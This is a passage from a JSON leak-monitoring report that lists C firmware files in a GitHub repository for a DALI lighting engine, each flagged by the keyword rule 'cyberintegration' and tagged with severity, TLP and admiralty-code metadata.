"red", + "tlp": "amber", + "ttl": 30 + }, + "id": "12d7224e305ed4e044163aeb74437190cf407caf", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/PowerManager/PowerManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/PowerManager/PowerManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9052514163ce57fe81a87536084cfa683d05f725", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/PowerManager/PowerManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/PowerManager/PowerManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": 
"37c492846a666c4511e87b6407f3fb5a5937270e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/SystemTick/SystemTick.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/SystemTick/SystemTick.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "88db0c983d1e0aa98d07310d4bb70c1459768226", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/SystemTick/SystemTick.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/SystemTick/SystemTick.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b95c8fde520d08601f8fddd38de83bf6abc4f83f", + "matchesType": [ + "keyword" + ], + 
"matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/SystemTick/SystemTick_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/SystemTick/SystemTick_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5398f6ff7e98cbade03b5166d242087aff77833c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Timers/Timers.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Timers/Timers.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "dd040d65a8c08c08ce121270d4ac741645b14fb7", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Timers/Timers.h", + 
"revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Timers/Timers.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "33132cf183c6c2d7d593577040d5f8e5777be49b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Timers/Timers_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Timers/Timers_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "213b51da637d25746bb472491811fef0ef8d935c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Clock/Clock_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": 
"cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Clock/Clock_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "7c443cdceb9086e3f1cf716d02794a45a67f1b02", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/DAC/Dac_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/DAC/Dac_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "dd6ca30c612ca05a6e7d9b13232556c00de7c26e", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/DAC/Dac_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": 
"355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/DAC/Dac_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6abedf3686154dc38645a8684b583ca60507cd58", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Event/Event_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Event/Event_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9faaa09c66f30e5f8152cc8142e46f4f363674fe", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Event/Event_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": 
"example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Event/Event_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1660a3a0d54f87d81ac1954a973094f2bc7650d8", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/GPIO/Gpio_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/GPIO/Gpio_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6a34daf04ea14f458669b574adebca4aec372190", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/GPIO/Gpio_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + 
"rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/GPIO/Gpio_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a5a4e9c25a1557bbccd2d764c0ab249138e1e783", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/I2C/I2c_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/I2C/I2c_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "27a206a9b095390b360bea70cd918c197ee897f2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/I2C/I2c_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": 
"https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/I2C/I2c_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "abe4473c1bf22c9e227ae6bb8dfaa1d23d368993", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/PowerManager/PowerManager_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/PowerManager/PowerManager_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "163dfcc812dc8678176e10647c9d94a29067a657", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/PowerManager/PowerManager_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": 
"https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/PowerManager/PowerManager_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "62135fbe72a49fc117ff45c51da465f7904087b5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/SystemTick/SystemTick_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/SystemTick/SystemTick_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "393a02cf86ae870951f61869f5d4efd18b1febdc", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/SystemTick/SystemTick_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": 
"https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/SystemTick/SystemTick_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "fdd0f29caed7ab1114e360ff049883b7e620fc74", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/SystemTick/SystemTick_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/SystemTick/SystemTick_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4261a01e8d39c506c238f830ae7180dea58d6202", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Timers/Timers_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": 
"https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Timers/Timers_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "7abe5053691aa1f16eedd96f8cf9ae708b04b1e5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HALConfig/Timers/Timers_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HALConfig/Timers/Timers_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4f3ff694d8d5c95d1ac697933132d5e708540721", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/QueueManager/QueueManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": 
"https://github.com/example/DALILightEngine/tree/master/Source/OS/QueueManager/QueueManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ed39279d060073536367f1b65876ace34b4ea55b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/QueueManager/QueueManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/QueueManager/QueueManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "263a023e5d8ccf8f7a51ebccdab85789e54b36b5", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/QueueManager/QueueManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": 
"https://github.com/example/DALILightEngine/tree/master/Source/OS/QueueManager/QueueManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "a90d7771125101ec8b7945af1cb3bc6893422415", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/SystemControlManager/SystemControlManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/SystemControlManager/SystemControlManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "6125166b747f04d722a1dff9f33b3f8c0ed5e464", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/SystemControlManager/SystemControlManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": 
"https://github.com/example/DALILightEngine/tree/master/Source/OS/SystemControlManager/SystemControlManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f6d88cf41619077e82aa8f4ee1b14f8f574d3c14", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/SystemControlManager/SystemControlManager_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/OS/SystemControlManager/SystemControlManager_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ed65c6fc60f553d1e615aaae88c703bdd2c88018", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/OS/TaskManager/TaskManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": 
